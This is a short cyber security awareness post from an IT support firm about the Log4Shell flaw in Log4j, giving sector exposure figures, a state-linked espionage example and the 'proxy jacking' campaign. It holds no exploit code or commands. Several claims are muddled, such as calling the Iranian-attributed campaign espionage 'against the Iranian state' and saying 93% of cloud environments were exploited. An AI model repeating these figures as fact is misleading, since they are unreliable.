Cyber-Attack Case Study: The Log4Shell Vulnerability

Cyber-Attack - Log4 Vulnerability

Log4j is an error and routine system operation, recording events and communicating diagnostics to system administrators, important for computers to run… It is also the most dangerous program as a vulnerability found put 72% of organisations worldwide at risk, this was dubbed the ‘Log4Shell’ vulnerability (CVE-2021-44228). 

In 2021, 93% of cloud-based environments were exploited, allowing cybercriminals to have full access to an organisation’s IT system either on the net or to remotely access the device, even through virtual machines, it took 10 days for companies and businesses worldwide to patch. Wiz, a cloud-based provider, calculated the statistics of the aftermath showing that organisations around the world are still vulnerable to Log4Shell:

  • Financial services at 50%

  • Healthcare services at 46%

  • Software at 46%

  • Media and entertainment industries at 43%

  • Retail at 41%

  • Manufacturing providers at 34%


An example of the exploit used includes the espionage conducted against the Iranian state, “The espionage-motivated threat actor Boggy Serpens (also known as MuddyWater, MERCURY/Mango Sandstorm) was attributed by CISA (Cybersecurity & Infrastructure Security Agency) to the MIOS (Ministry of Intelligence and Security) of the State of the Iranian state. This was detected by Microsoft when they exploited this vulnerability when attacking organizations in Israel in July 2022.” stated Alex Hinchliffe, Threat Intelligence Analyst.


It has been 2 years since the vulnerability has been discovered and patched, but threat actors have found endless ways to exploit Logj4 even in 2023. Director of Product Marketing, Amit Shah, stated in an interview about a new hacking process dubbed as ‘proxy jacking’. 

“Some companies are still vulnerable to Log4Shell because they have not yet been able to find and patch all instances of Log4j. For example, a new attack campaign involving ‘proxy jacking’ was recently discovered. This involves attackers trying to install proxyware, then selling Internet bandwidth from victims. While this is a nuisance rather than a serious threat, it can still cost victims dearly when a cloud provider charges fees based on measured data traffic. In addition, a victim’s internet bandwidth could be used for a cyber attack.”


Your Security is our Priority

Your friendly Support Team

the computer department logo

Speak to us about all your computer needs

This is Part of our Cyber Security awareness educational campaign. Through this training, you will learn awareness and key principles, and best practices to protect yourself, your organisation, and the public from cyber attackers. You will also be equipped with the knowledge to identify potential threats and take action before any damage can occur.

 
Previous
Previous

BYOD and Personal Use at Work… How Safe is it?

Next
Next

Cyber Crime in Spain: Bots for Booking Scam